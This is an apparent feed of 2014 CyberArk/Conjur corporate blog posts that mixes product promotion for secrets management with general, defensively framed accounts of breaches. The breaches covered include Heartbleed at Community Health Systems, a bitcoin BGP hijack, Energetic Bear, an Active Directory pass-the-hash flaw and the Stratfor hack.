Today, Bloomberg is reporting that it appears that this hack was not exclusively the domain of malware, as previously stated. Instead, it appears to have been the result of a specific Heartbleed-related attack.

Citing from the report released this morning: “We never had any tangible proof of an attack until now,” said David Kennedy, founder of TrustedSec LLC, a security consulting company based in Cleveland, Ohio, who first reported Heartbleed was used to attack Community Health on his company’s website. […] The Chinese hackers exploited the Heartbleed flaw to steal user names and passwords to access one of the company’s private communications channels, Kennedy said. The incursion happened about a week after Heartbleed was made public and before Community Health altered its security to reduce its vulnerability, Kennedy said.”

08_20_14

What’s particularly troubling is the speed with which the attack happened; CHS took the appropriate steps, revoking their SSL keys and issuing new ones, but the time window between the announcement of the vulnerability and the response was wide enough for the criminals to get in, steal data, and get out before the mitigation was complete.

Many vendors in the security space will attempt to make hay from this hack. However, we believe that Conjur specifically solves for this type of problem: had CHS “conjurized” their SSL keys, revoking and changing them would have been a process that could have been completed in minutes, not days or weeks. This is, in fact, exactly how many of our customers are approaching their infrastructure moving forwards, precisely to avoid this kind of massive vulnerability and failure.

Don’t fall victim to the next Heartbleed attack. If your infrastructure exists in a regulated industry, or if you’re storing secrets (including SSL certs) in places like git, Puppet, Chef, or Docker images, we can help provide a more automated authz solution, and we can and will find a way to work with your DevOps team to do so. The stakes are simply too high, and too many of these hacks and breaches are occurring to leave the problem unmanaged.

The link below leads to a technical overview of the Conjur platform; if you’re interested in getting your hands on a free trial of Conjur and exploring how it can help with secrets management, drop us a line at info@conjur.net.

 

]]>
Robbing the Virtual Bank: Privileged Credentials to Blame https://www.cyberark.com/blog/robbing-virtual-bank-privileged-credentials-blame/ Fri, 15 Aug 2014 14:22:38 +0000 https://www.cyberark.com/blog//

The U.S. Consumer Financial Protection Bureau (CFFB) recently issued an advisory on the risk to consumers posed by virtual and cryptocurrencies, like Bitcoin. This warning from the CFFB couldn’t have come at a better time given the growing number of stories we’re seeing on hackers targeting cryptocurrencies.  Andy Greenberg of Wired recently uncovered how a hacker took control of an ISP to steal bitcoins.

According to the researchers Greenberg talked with, “a bitcoin thief redirected a portion of online traffic from no less than 19 ISPs, including data from the networks of Amazon and other hosting services like DigitalOcean and OVH, with the goal of stealing cryptocurrency from a group of bitcoin users.”

The details of the attack are still emerging, however, what is clear is that an employee’s credentials were exploited. It’s not clear if this was done by an outsider, via phishing or by using other techniques, or if this was a malicious insider situation.

The employee’s privileged account credentials were clearly used to perform an attack known as BGP hijacking (border gateway protocol attack), effectively routing the network traffic at the connection points between Internet networks.

In other words, the attacker was able to broadcast a spoofed command that redirected traffic from other networks to a server controlled by him/her. From that server, the hacker sent the mining computers a “reconnect” command and changed the machines’ configurations to deliver the processing power to a pool owned by the attacker.

So what could the ISP have done?  For starters, monitoring the actions and commands sent to the routers at the border gateway could have been helpful in order to detect and prevent this attack.

More importantly, they should have been monitoring the activity of their privileged accounts. This would have enabled them to discover anomalous behavior which could indicate account hijacking or malicious insider activity.

If you’re interested in learning more about how privileged account activity can tip you off to an advanced attack, check out Roy Adar discussing privileged threat analytics.

 

]]>
Conjur Technical Overview https://www.cyberark.com/blog/conjur-technical-overview/ Thu, 14 Aug 2014 11:53:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-technical-overview/  

Cloud Security and Conjur: Technical Overview

Conjur was designed to provide DevOps and technical organizations with a simple to use, flexible, cloud security and authorization (authz) platform for monitoring, managing, securing, and auditing permissions at scale.

Today, we are releasing a Technical Overview guide that describes:

08_14_14

  • What Conjur is, from both a business and technical perspective
  • How Conjur is most often used by organizations
  • The technical architecture and design for the Conjur platform
  • How to get started using Conjur, whether it’s on bare metal, or with common DevOps tools such as Docker, Chef, SaltStack, Puppet, and Ansible

Ready learn more about the Conjur platform and how it can help to simplify cloud security and compliance, and provide robust authz for your team? Download the guide now!

Learn how Conjur is built and structured, including most common use cases!
Download the Technical Overview Guide!

 

]]>
Thursday’s Black Hat Recap https://www.cyberark.com/blog/thursdays-black-hat-recap/ Fri, 08 Aug 2014 18:42:35 +0000 https://www.cyberark.com/blog//

It’s over and we’re a bit sad to leave all the great conversations.  Before we head over to Defcon, we wanted to share some thoughts on Thursday’s Black Hat events. Privileged account security is on everyone’s radar as a critical link in the kill chain against advanced threats. Almost every CISO and security professional that we’ve talked to understands that locking down privileged credentials is critical to protecting the enterprise.

This was reflected in many sessions throughout the conference. From the dangers of privileged escalation to hacking into medical devices and ICS systems through default and hardcoded privileged credentials, there is an on-going discussion of the role privileged accounts play in advanced attacks. It’s not hard to see why when we’re inundated with breach stories on an almost daily basis. We believe privileged account takeover is the crux of every advanced attack … And no, it’s not just because our purpose in life is to solve the privileged account security challenge.

Bruce Schneier’s Presentation

This session on the evolution of the incident response industry was a must attend. Schneier discussed the importance of an incident response ecosystem that helped businesses deal with the threat landscape and overcome challenges driven by three primary trends:

  1. Companies are Losing Control of their Infrastructure:  Cloud computing, outsourcing, the dissolving perimeter with a mobile workforce – these are all trends that have taken infrastructure control out of the hands of businesses.  As a result, organizations are becoming more reliant on partners and third-parties to protect their own networks and to prevent attackers from using partner networks as backdoors into the primary target network.
  2. Attacker Sophistication:  Schneier made some excellent points on the state of cyber-warfare.  His overall point was that cyber crime as an industry has matured almost as fast as the security industry.  We’re seeing attackers use war-like tactics to perpetrate their attacks, with the biggest difference being that in a ‘traditional’ war, you can usually tell who the enemy is by the weapons they use.  This isn’t the case in the cyber-world, where states and rogue actors are releasing sophisticated malware and cyber-weapons and making them available to a growing percentage of attackers. His inescapable point was that the sophistication has reached the level where it is impossible to keep motivated attackers or groups out of your network.
  3. Government Involvement:  The growing number of state-sanctioned hacker groups has driven an increasingly menacing threat landscape.  We’re in the middle of a cold-war arms race, except nations are stockpiling zero-day exploits, vulnerabilities, and nasty malware for when the time is right to strike.

So what does this have to do with incident response, and more specifically, privileged threat analytics?  The point was that the need for real-time incident response has never been greater.  While a lot of the process and information gathering can be automated, there needs to be a human element to intellectually figure out what the right response should be.

Schneier believes that the human component of incident response must be fueled with information on the methods attackers use to infiltrate an organization and exfiltrate data.  This is where privileged threat analytics comes in. Real-time analytics on the anomalies of privileged user behavior will be a critical driver in the incident response industry, providing the IR teams with the information and insight needed to get ahead of attackers that may already be on the network.

This is our contribution to the industry and we’re focused entirely on finding innovative ways to disrupt the ‘privileged pathway’.

]]>
Wednesday’s Black Hat Recap https://www.cyberark.com/blog/wednesdays-black-hat-recap/ Thu, 07 Aug 2014 14:29:59 +0000 https://www.cyberark.com/blog//

We’re at Black Hat this week sharing in the discussion on the biggest trends and happenings in the cyber security world.  So far, it’s been a great show with a lot of activity. Here are a few items of note from the show floor and from some of the great presentations.

Russian Cyber-gangs Amass More than a Billion User Credentials:

The New York Times broke the story right before the show opening that new research shows that Russian cyber gangs, dubbed CyberVor, have amassed about 1.2 billion user credentials from across thousands of websites.  This has generated a lot of discussion at the event – from if this is legit, to support for the researcher who refuses to provide the world with details – however, there’s little concern from the security community itself. The main takeaway from people we’ve talked to is that this is just the latest in a series of password dumps that continue to happen with greater frequency – and emphasizes the problems that plague password security.

The reality is that we won’t be able to get rid of passwords until a more secure and user-friendly authentication mechanism is available. Even then, we’ll still have all the legacy systems to contend with that do not support any other authentication method. What CyberVor really tells us is that the immediate problem is with password re-use. If you do the math, the number of credentials stolen divided by the number of sites they were taken from, shows that people continue to re-use passwords across properties.

It will take some time for service providers to employ secure salted hashing schemes that will make it more difficult for attackers to get to the actual passwords.  While it’s critical that organizations rollout automated systems to secure the credentials for their sensitive assets, it’s imperative that we also start educating people about the dangers of password re-use and identity theft.

Retail/PoS Breaches Dominate

The sessions looking at PoS attacks have been standing room only – they serve as a microcosm of the problems that plague the industry. As highlighted in our recent survey, PoS attacks have changed security policy more than any other attack except the NSA/insider breach.  Attackers are infiltrating these networks either through direct attacks like phishing, or by attacking a third-party vendor’s connection to the target company’s network. However, the real flashpoint occurs once the attackers get inside: which is the theft of insider credentials, giving them the ability to implant malware directly in the pathway of user financial information.

Latest Attacks and Malware are Dependent on Privileged/Insider Credentials

There have been a lot of great sessions focusing on the newest and most virulent forms of malware, the latest phishing schemes, and how attackers can infiltrate corporate systems through connected devices like VoIP phones and copiers.

What’s missing from these conversations is the fact that attackers need privileged and insider credentials to allow these attacks to do damage or move beyond the device itself. Case in point illustrated by Dan Munro on multi-function printers in healthcare organizations. It’s a must read if you think printers are not an important access point to lockdown. Whether its default passwords in connected devices or using insider credentials to install malware, businesses need to focus on the mechanism attackers are using to actually carry out their attacks.

The Best is Yet to Come

Our very own Andrey Dulkin will be giving a session tomorrow on Pass-the-Hash attacks – a must see! He’ll use proprietary research from multiple in-use networks to demonstrate just how prevalent and easy to find hashes are on a network. Of course, he’ll also talk about how you can prevent hackers from finding your hashes before you have a chance to lock them down.

]]>
Recap: HackSurfer Hangout with Kevin O’Brien https://www.cyberark.com/blog/recap-hacksurfer-hangout-with-kevin-obrien/ Thu, 07 Aug 2014 14:58:00 +0000 https://cyberarkvx2.wpengine.com/blog/recap-hacksurfer-hangout-with-kevin-obrien/  

Code Spaces, Cloud Security, and Conjur

Earlier today, Kevin O’Brien was live on a HackSurfer Hangout with Jeff Peters, discussing cloud security and cloud authorization. Miss it? No problem! Check out the archived copy below!

08_07_14

In this 30 minute Q&A session, Kevin and Jeff talked about the Code Spaces shutdown, DevOps and what the implications for it are for security, compliance, and auditing, and the continuing shift of “real” applications to the cloud.

Join the discussion! Contact us with any questions and get started with Conjur today!

 

 

]]>
Live Hangout with Kevin O’Brien https://www.cyberark.com/blog/live-hangout-with-kevin-obrien/ Thu, 07 Aug 2014 12:16:00 +0000 https://cyberarkvx2.wpengine.com/blog/live-hangout-with-kevin-obrien/  

AWS Hacked? Not quite.

When Code Spaces went down in less than 48 hours, it was a big hit to the cloud technology sphere. Was AWS hacked? Not quite.

Code Spaces’ AWS account was compromised first via a DDoS attack; they were blackmailed in an attempt to get them to pay to have their account access restored, and when they tried to retake the account the attacker maliciously deleted Code Spaces’ and their clients’ data, leading to a complete and permanent shutdown of Code Spaces.

08_07_14

We wrote about the Code Spaces situation shortly after the data was released. We stressed the need for least privilege as the base for cloud infrastructure, segmentation of data, and simple access intelligence controls.

On August 7, our own Kevin O’Brien will be joining HackSurfer to do a live hangout Q&A regarding Code Spaces, DevOps, the Cloud, and Infosec. Please join us! You can watch live (August 7th, 1:00-1:30pm EST) by signing up on the HackSurfer page, or any time afterwards from the HackSurfer archives.

We look forward to hearing from and chatting with you!

 

]]>
Authz as a Service: Automate. Automate. Automate. https://www.cyberark.com/blog/authz-as-a-service-automate-automate-automate/ Mon, 04 Aug 2014 12:21:00 +0000 https://cyberarkvx2.wpengine.com/blog/authz-as-a-service-automate-automate-automate/  

Authz as a Service

One of the ideas that underpins the entire DevOps movement, from Chef to Puppet, Ansible to Docker, is the idea that the age of automation has arrived. The promise of automation is that users of these new toolchains can get user and access management (“authz”), server creation and deprovisioning, and policy changes to be simple, repeatable, and most importantly, automated throughout their entire infrastructure.

As stated by Werner Vogel, CTO of Amazon, back in 2012 “Automate your application and processes; humans are terrible at automation.”

He was not kidding.

08_04_14

Humans tend to be inefficient and error-prone when performing repetitive tasks, and ergonomics studies suggest that even on a biomechanical level, the human body is not well conditioned for repeating the same motions over and over again — take, for example, the repetitive motion injuries seen in workers from Ford’s assembly line. The consequences of these errors tend to be magnified in environments where speed is enhanced by machines; a misconfigured access right may be relatively innocuous when it only impacts a single user or machine, but with the modern cloud-based infrastructure stack, that error is apt to be replicated to dozens or even hundreds of servers.

DevOps are a growing group of people who are working to automate operations and bring down the number of preventable accidents by using trusted images, tools like the ones listed above, and better predictive design in the compliance realm. Accordingly, many are turning to Conjur to help them implement authorization-as-a-service, with which they can define a single set of rules and permissions and allow them to propagate across their environments seamlessly and correctly.

If you’re looking to understand and improve authz for your own DevOps team or project, we can help! The easiest way to get started is simply to roll out a trial appliance; doing so is as easy as signing up.

]]>
Mitigation Techniques for Energetic Bear https://www.cyberark.com/blog/mitigation-techniques-energetic-bear/ Fri, 01 Aug 2014 20:40:05 +0000 https://www.cyberark.com/blog//

By Shiri Licht

In the last post, we talked about the Energetic Bear, also known as Dragonfly, which is suspected to be a series of attacks by a group of Russian hackers who have been in operation since at least 2011 and have mainly targeted the energy sector and related industries. In that post, our research team at CyberArk Labs dissected how the Energetic Bear attackers operated to reach their goals using the privileged escalation pathway, making themselves defacto “insiders” on a network. In this post, we’ll discuss mitigation techniques.

Mitigation Techniques:

There are ways that these types of attacks can be mitigated. By protecting privileged credentials, organizations can prevent the attackers from operating inside the network, even if the attackers are successful in their initial breach, stopping the attack before it reaches its actual goal. As attackers are looking to hijack and exploit privileged credentials to operate in the network, here are some techniques that can be used in isolation or as part of a comprehensive privileged account security strategy:

  • Implement a jump server that prevents credentials from residing on endpoint machines and therefore prevents the attackers from hijacking the credentials and gaining direct access to sensitive assets.
  • Monitor privileged account activity to learn the normal privileged behavior in your network and detect anomalies that may indicate malicious activity. .
  • Use an automated password management solution to eliminate typing or observing passwords when connecting to systems in the network. This way, attackers can’t retrieve passwords from screenshots or key-loggers.
  • Use a credentials management system that can generate random, complex and unique passwords and replace the passwords according to your organizational policy. This can prevent an attacker from brute forcing passwords to assets in the network.

Critical infrastructure will always be a top target in nation state-sponsored attacks. Energy companies and other critical infrastructure organizations need to take steps to better secure their ICS by locking down privileged accounts and preventing outside attackers from becoming privileged insiders.

]]>
It’s 11pm. Do you know where your credentials are? https://www.cyberark.com/blog/its-11pm-do-you-know-where-your-credentials-are/ Wed, 30 Jul 2014 12:25:00 +0000 https://cyberarkvx2.wpengine.com/blog/its-11pm-do-you-know-where-your-credentials-are/  

The Cloud Credential Conundrum

We’ve all been there. You have an urgent project, and need to hire in a consultant with a specific skillset to get it done. You go through the interview and hiring process, get them onboarded, and grant them access to your systems. Keys get assigned, and since you have a top-notch DevOps team, everything is automated with Chef, SaltStack, Puppet, and Ansible

Your hired gun completes their tasks and you part ways; they pack up and head out, on to their next gig.

But wait, did you deprovision them? Can you deprovision them? Do they still have viable credentials to your system? Are those credentials still sitting in a git repo or a configuration management tool image somewhere?

Deprovisioning users and managing authn and authz, whether ex-employees, employees with role changes, or even code written by contractors and left running in your infrastructure, needs to be simple, efficient, and managed with discipline. This is a common problem area, from the tiny start up to the enterprise , but it is rarely on the security radar, even though insider access is one of the most prevalent causes for long-term compliance and security issues.

07_30_14

If you’ve shared credentials, you risk breaking a dozen other users’ login causing your IT team to be bombarded with emails Monday morning at 9am. If you provided their own set of credentials, you need to make sure all access to your systems is shut off.

User access control is not only good housekeeping, it is a mandated control under a number of regulatory requirements. An example of such a control can be found in HIPAA / HITECH: Identity and Access Management: User Access Revocation – IAM-11 45 CFR 164.308 (a)(4)(ii)(A) which states:

Timely de-provisioning (revocation or modification) of user access to data and organizationally-owned or managed (physical and virtual) applications, infrastructure systems, and network components, shall be implemented as per established policies and procedures and based on user’s change in status (e.g., termination of employment or other business relationship, job change or transfer). Upon request, provider shall inform customer (tenant) of these changes, especially if customer (tenant) data is used as part the service and/or customer (tenant) has some shared responsibility over implementation of control.

(For more HIPAA compliance regulations, see our Guide to HIPAA Cloud Compliance)

Of course, it should not be just the user who needs to be deprovisioned, but also their active and non-active scripts in your infrastructure. Each script should be checked and certified, before being reassigned to a different employee.

Achieving credential management visibility is vital for proper system security and proof of access control, without burdening your engineering, IT, or devops teams.

 

 

]]>
CyberArk 2014 Global Advanced Threat Landscape https://www.cyberark.com/blog/cyberark-2014-global-advanced-threat-landscape/ Tue, 29 Jul 2014 14:43:02 +0000 https://www.cyberark.com/blog//

Yesterday’s release of the CyberArk advanced threat survey marks the eighth year in a row we’ve surveyed business and IT leaders to better understand what cyber security issues are top of mind for practitioners around the world. The 2014 survey can be downloaded here, although if you want a quick read, here are the highlights:

Snowden and Retail/PoS Breaches Influence Security Strategies the Most
We asked the respondents to select which cyber-attacks had the biggest impact on their business’ security strategy. Not surprisingly, 68 percent of respondents said the NSA and the PoS attacks at several high-profile retailers were the top two on the list.

Blog-2014-Survey-Chart-WhatTypeOfBreach

While the NSA breach is widely regarded as the prototypical insider-based attack, and the retail/PoS breaches are regarded similarly for outside attacks, the critical link between both attacks was the compromise and exploitation of privileged credentials.

Third-Party Privileged Access Emerges as Critical Security Vulnerability
Companies continue to provide routine network access to make it easier for partners, vendors and other trusted third-parties to provide services. While this certainly streamlines the supply chain, the bad guys are using this route to go after these partners to steal and exploit their privileged access to the target company’s network.

And what do businesses say about this? They have little confidence that their third-party vendors are properly locking down and securing privileged access to their networks.

Blog-2014-Survey-Chart-3rdPartryVendors

Blog-2014-Survey-Chart-3rdPartryVendorsConfidence

Attackers are on the Inside – Protect Your Privileges
Last year we found that 52 percent of companies thought that their network had either been breached in the last 12 months, or that an attacker was currently on their network. We asked the same question again this year to see if things got better, but turns out the issue is in the same place – 52 percent said yes again this year. (Maybe the other 48 percent just won’t admit it …)

The reality is, no matter how tight your security is, motivated attackers will find a way onto your network. Once they’re on the network, things can get ugly. As you can see from the chart below, the majority of organizations surveyed believe that attacks that reach the privileged account takeover stage are the most difficult to detect, respond to and stop. Once an attacker gains defacto insider status, a breach is incredibly hard to stop without the right tools in place.

The overall take away from this year’s survey? Whether attacks start with a malicious insider, or a rogue outside group/person, stealing and exploiting valid privileged credentials is critical to the success of the attacks. If your organization wants to gain an edge in stopping advanced attacks – start by locking down the privileged pathway all attackers take.

Blog-2014-Survey-AttackStage

 

]]>
Introducing and Explaining Conjur https://www.cyberark.com/blog/introducing-and-explaining-conjur/ Mon, 28 Jul 2014 12:28:00 +0000 https://cyberarkvx2.wpengine.com/blog/introducing-and-explaining-conjur/  

DevOps and Compliance: Introducing Conjur

Over the past two months, Conjur has seen a tremendous uptick in the number of devops and compliance users who are exploring the platform’s potential and upgrading their authz strategies within their cloud infrastructure. We couldn’t be more excited — and we are incredibly proud to have teams like Netflix working with us, changing the face of authorization as a service.

07_28_14

Conjur is sometimes described as the “Active Directory for the cloud” owing to its simple and robust user, group, and layer permissioning system. As more teams and devops experts start using Conjur, we wanted to offer an easy to way to explain what we do — and so, we’ve created this quick video, describing some of Conjur’s abilities and uses.

Ready to explore Conjur yourself? Great! Just click the button above and we’ll get you started. If you have any questions, drop us a line at info@conjur.net!

 

 

]]>
Simple Guide to HIPAA Compliance https://www.cyberark.com/blog/simple-guide-to-hipaa-compliance/ Thu, 24 Jul 2014 12:45:00 +0000 https://cyberarkvx2.wpengine.com/blog/simple-guide-to-hipaa-compliance/  

Cloud HIPAA Compliance with Conjur

HIPAA compliance is a common requirement for organizations who are moving infrastructure, workflows, and business processes to the cloud. Accordingly, there are requirements for managing access to appliances, databases, and devices, as well as for controlling permissions to access and modify data, that must be complied with. Ensuring full visibility for audits and regulatory adherence can be a massive undertaking, and shifting PHI and sensitive data to the cloud is often viewed with a combination of trepidation and resistance.

But does it have to be this way?

07_24_14

An article from 2013 disputes the common idea that housing, analyzing, and sharing (in this case specifically genomic) data in the cloud has more breach risk than hosting on-prem. The primary sources of data breaches reported to the Department of Health and Human Services were, interestingly, via “loss or theft of an electronic device” such as a laptop or flash drive with unencrypted data.

Obviously, this particular data exfiltration vector can be addressed by moving protected information to the cloud. However, doing so also introduces new risks, but unlike physical data loss these can be addressed through operations and management, decreasing the risk of human error.

Conjur can help implement these operational and automated HIPAA compliance processes. As a recent post points out, the terms can be muddled and confusing, but we have put together a HIPAA Resource Sheet to help address and clarify where and how to map our authz platform to your HIPAA requirements.

Conjur understands the requirements of HIPAA and can help you understand and fill the gaps in your system.

 

 

]]>
Meet the Energetic Bear https://www.cyberark.com/blog/meet-energetic-bear/ Wed, 23 Jul 2014 14:34:36 +0000 https://www.cyberark.com/?p=3757

By Shiri Licht

Recently, Symantec reported that Russian hackers are after western oil and gas companies. According to the coverage, the attackers are targeting energy grid operators, major electricity generation firms, petroleum pipeline operators, and energy industry industrial equipment providers located in the US, Spain, France, Italy, Germany, Turkey, Poland and more. The Energetic Bear, also known as Dragonfly, is a suspected attack by a group of Russian hackers who have been in operation since at least 2011 and have mainly targeted the energy sector and related industries. We’ve talked in great length about why attackers tend to target Industrial Control Systems (ICS) used in critical infrastructure and while these organizations understand that they are targets, it’s difficult to protect themselves.

Our research team at CyberArk Labs has analyzed how the Energetic Bear attackers operated. Like other breaches of its kind they were also looking to use the privileged escalation pathway to make themselves defacto “insiders” on a network. Using our privileged escalation model we’ve outlined the attack below. The privileged escalation cycle comprises three stages: gaining access credentials, retrieving the credentials and use of these credentials to reach their goals:

The Energetic Bear in the Privilege Escalation Cycle:

Privilege Escalation Cycle

Initial Breach and Access Point:
As we’ve seen in many other publicized breaches, the Energetic Bear infiltrates networks through known means, using both phishing and watering hole attacks. In this case, the group also employed an interesting method – they compromised a number of ICS software providers and infected their software with malware. When the ICS software was updated during normal operations, connected machines got infected with the malware. This was only the beginning.

Retrieval of Credentials:
Next, the attackers went for the most coveted asset in an attack – privileged accounts or credentials. To do this they used two main tools with credential-stealing and remote access capabilities. A Remote Access Tool (RAT) is malware that enables the attacker to connect and interact with the infected machine. RATs often have additional capabilities and in this case these included various means to steal credentials. The two tools in this attack were:

  • BD Oldrea, also known as Havex – the BD (back door) is a “light” tool, with minimum capabilities. Its main use is to maintain the presence of the attackers in the network and allow installation of more complex malware on the infected machine. A recent finding regarding the Havex malware shows that this tool actively scans OPC servers that control devices in critical infrastructure networks.
  • Trojan Karagany – the Karagany runs modules, including those that collect credentials and take screenshots.

Usage of Credentials:
When the attack was discovered, it seems the attackers were setting up the infrastructure for further attack. The tools used made it possible for the attackers to steal credentials, and gather system information, including lists of files, programs installed, roots of available drives, data from the computer’s Outlook address book and VPN configuration files. The stolen credentials would enable the attackers to deepen their penetration, impersonate legitimate insiders and employ privileged accounts to entrench themselves in the network.
In our next post, we’ll discuss mitigation techniques.

]]>
Rethinking Active Directory for the Cloud https://www.cyberark.com/blog/rethinking-active-directory-for-the-cloud/ Thu, 17 Jul 2014 12:54:00 +0000 https://cyberarkvx2.wpengine.com/blog/rethinking-active-directory-for-the-cloud/  

Active Directory for the Cloud – The Conjur Solution

Earlier this week, security firm Aorato “identified a new threatening flaw within Active Directory that enables attackers to change a victim’s password, despite current security and identity theft protection measures”.

In essence, this flaw has more to do with how Active Directory is designed than it does with a bug. An attacker who obtains the NTLM hash from a client can then force authentication with it, bypassing the more-secure Kerberos system in favor of the (known to be weak) NTLM authn protocol. It’s a classic pass-the-hash attack, but one that is (a) enabled by default in AD, (b) not logged by the system, and (c) can be used even when Kerberos is selected for authentication, since Kerberos relies upon NTLM for encryption.

Stepping back, what does this mean?

07_17_14

One perspective is that this flaw is indicative of how Active Directory is poorly aligned with the rapidly expanding set of devices, services, and platforms that comprise the modern infrastructure stack that many companies are moving to. The combination of poor technical choices and weak logging mean that as the threat surface expands, AD struggles to provide robust authn and authz. In other words: Active Directory is a legacy tool, and while essential for many organizations today, it should be carefully considered and replaced when IT and DevOps teams are moving some or all of their infrastructure to the cloud.

In doing so, there is an opportunity to break down and rebuild both the authn and authz model. Unlike Active Directory, this new model should comprise three elements:

  • Extensibility — unlike the network model that existed when AD was designed, the modern network is highly dynamic, with rapid system, service, and server provisioning and deprovisioning; by federating authn and centralizing authz, environmental change can be easily sustained without creating single failure points (as happened with AD in this case)
  • Auditability — relying on external logging exclusively can result in auth blind spots; wherever a user or service accesses a component under management from the authz system, permissions rules should broker that access and also log the incident in an immutable datastore.
  • Security — modern development practices and avoidance of legacy support requirements (such as the Kerberos/NTLM problem that arose in AD as a legacy of a Windows NT key system) helps to reduce the likelihood of built-in vulnerabilities

As organizations drive innovation and change in their own IT and development teams, they typically shift their architecture focus to the cloud. This creates an opportunity to set aside legacy technologies like Active Directory, which do not map to this new infrastructure stack, and in doing so create a more robust, secure, and cloud-native authz system.

 

]]>
Netflix Selects Conjur for Cloud Native Authz https://www.cyberark.com/blog/netflix-selects-conjur-for-cloud-native-authz/ Mon, 14 Jul 2014 13:02:00 +0000 https://cyberarkvx2.wpengine.com/blog/netflix-selects-conjur-for-cloud-native-authz/  

Netflix Infrastructure Team Selects Conjur

We are tremendously excited to announce thatthe Netflix infrastructure team has selected Conjur for use as their cloud-native authorization (authz) as a service provider, part of a broader initiative around their aggressive “10x plan” to shift their entire operational IT infrastructure to the public cloud.

Netflix is an amazing company to work with. Well regarded within the technology world for their (now famous) culture deck, their belief in the principles of freedom and accountability described within it has been evident from our first conversations.

Of equal importance is their foundational understanding of the role of technology (including Conjur), which informs how they see the architectural and technical decisions regarding the design and implementation of what we see as the “new public cloud stack”.

As Mike Kail, who heads up IT Operations for Netflix, describes it in the case study, Conjur supports the “rapid adoption of seamless Ops and Development technologies, the kind that do not disrupt the workflows of your people but instead help them be more innovative and move faster, is achievable today. “

07_14_14_netflix

We could not have described more succinctly or accurately what we think authz for the cloud means. Mike and Netflix have an awareness of innovation at speed and how IT enables it; this is an idea we embrace at Conjur at all levels.

Earlier this month, over the Fourth of July holiday, Elizabeth sent around a note to the team that articulated this succinctly:

“There is a revolution underway. Cloud, mobility, the ideas of DevOps: we are part of an industry in the midst of change.

What that means is that there are a lot of very smart people in technology roles struggling with the infrastructure that surrounds them. Pushed by the desire for innovation, they are looking for ways to grow their businesses and empower their teams, meet greater challenges, and do it all while minimizing business risk.

These are our customers and peers. They understand, natively, that “failure is not an option”. That is why we are here; Conjur exists to provide a safe environment for people to build innovative products, disrupt the industries in which they operate, embrace the cloud, and remain competitive.

Most people don’t know what the other side of this revolution looks like, yet. Our mission, through our product, culture, and actions, is to show them.”

So, how about you? Are you building a “new cloud stack”, and driving innovation at your organization? Do you have a cloud-first mandate?

 

]]>
Getting To Cloud Native Authz https://www.cyberark.com/blog/getting-to-cloud-native-authz/ Fri, 11 Jul 2014 13:24:00 +0000 https://cyberarkvx2.wpengine.com/blog/getting-to-cloud-native-authz/  

Cloud Native Authz

At the AWS Summit in New York City this week, one of the major themes woven into the keynote (as well as many of the other presentations) was the idea that companies and the people within them who truly understand the value of DevOps/continuous integration/disruptive innovation should be seeking “cloud native” partners, vendors, and platforms.

In part, cloud nativity is simply a pointer, indicative of organizations who build, think, and execute differently from their peers who were born in a different era. It is, in other words, a means of identifying those organizations that believe in (or at least buy into) the same conceptual frame work.

We like to believe that we (and Conjur the product) are “cloud native”. As Elizabeth often points out, our earliest roots are born in frustration when innovation at a previous employer was hampered by a lack of cloud-ready authorization services – a problem we are 100% focused on solving. Part of the challenge in doing so is that many of our friends in the industry are still figuring out how to describe the differences between authentication and authorization (see our recent blog on this subject.)

More broadly challenging is that DevOps and cloud-first initiatives are terra incognita for most companies who were not founded within the last few years. Cloud computing, especially at the infrastructure level, is fundamentally changing how organizations source, host, and manage applications, data, and workflow, and finding vendors and solutions that are built with this new infrastructure in mind can be daunting; many companies hack together solutions where vendors have not yet provided them, or where the requirements that reflect a truly well-designed solution are not yet clearly defined.

07_11_14

Of course, that’s not a great way to handle something as mission-critical as authorization. In claiming that Conjur is “cloud native authz”, we are looking to help clarify how to think about and manage authorization in the new infrastructure stack – something that we have heard called the Cloud OS from vendors like Microsoft, and which others refer to as the “cloud stack” (see, for example, Amazon’s new Zocalo announcement, broadly focused on an enterprise-friendly use case for cloud storage) – without relying on hacks and kludges.

In a nutshell, we believe that any robust “cloud native authz” platform should embody three characteristics:

  • Extensibility: The platform selected should quickly adapt to a wide and (at best) loosely undefined set of different infrastructure and platform decisions; organizational needs will change over time, and no assumptions should be made regarding what the environment will look like from month to month, or even day to day. Any authorization platform used should be capable of abstractly supporting any platform/system in order to remain relevant and usable across even foundational architecture changes.
  • Efficiency: Core authorization concepts (tokens, user-to-server and service-to-service management, etc.) all need to be implemented securely; look for a solution that doesn’t require extensive in-house coding or scripting of these core features, and is ready to use out-of-the-box. Avoid the temptation to build something entirely in-house, as it creates a long-tail of support as well as a significant up-front development cost (or worse, an unknown cost as scripts, configuration management systems, and repositories are shoehorned into roles that directly contradict their fundamental design objectives).
  • Scalability: Assuming that organizations that are looking for “cloud native” solutions are also believers in continuous integration and rapid iteration philosophies, the authz provider they select must be capable of coping with rapid and high-volume change in very short timeframes; look for solutions with robust master/follower architectures that can both provide a single system of record and a rapid distribution model for public information (without relying on, for example, configuration management tools to do so). There are likely more bullets to be added to this list over the coming months. Topics such as native auditability (which Conjur supports out of the box, removing the need to hand-crank audit reports as most organizations do today), a finer distinction between deployment time for development vs. operations (again, Conjur is ready to use almost immediately for both departments), and end-to-end automation are still being worked out with our customers, but we believe there is a growing consensus around what well-built cloud native authz will look like.
    <!– [if lte IE 8]>

    <![endif]–>Download the Conjur Data Sheet!

      

    This is a tremendously exciting and quickly evolving space, and we’d love to hear what you’re seeing, struggling with, and succeeding at within it.

    Drop us a line, or have a look at our one-page sheet describing how Conjur works today.

 

]]>
Geopolitical Intelligence Firm Yields 90,000 Credit Card Accounts https://www.cyberark.com/blog/geopolitical-intelligence-firm-yields-90000-credit-card-accounts/ Thu, 03 Jul 2014 22:47:25 +0000 https://www.cyberark.com/?p=3528

A confidential report from the Verizon investigations team detailing the 2011 Stratfor cyber-attack and data breach has recently leaked to the press.

Stratfor is a geopolitical intelligence firm that basically serves the same functions as most retailers – selling, “strategic analysis and forecasting to individuals and organizations around the world.” In 2011, the hackers stole more than five million sensitive emails and sold them to WikiLeaks.

The hackers also said they had details for more than 90,000 credit card accounts. Among the organizations listed as Stratfor clients: Bank of America, the Defense Department, Doctors Without Borders, Lockheed Martin, Los Alamos National Laboratory and the United Nations.

What the Verizon investigation showed is how prevalent privileged account abuse was to this breach. According to the Verizon report:

  • Stratfor allowed insecure and unmonitored remote access that was left permanently enabled (RDP and SSH).
    • For example, web and database servers were accessible over the Internet – and admin access to these systems was designed to be accessible both internally and externally – however Stratfor IT personal did not know about this. Employees would routinely access these powerful accounts from home, office, and everywhere.
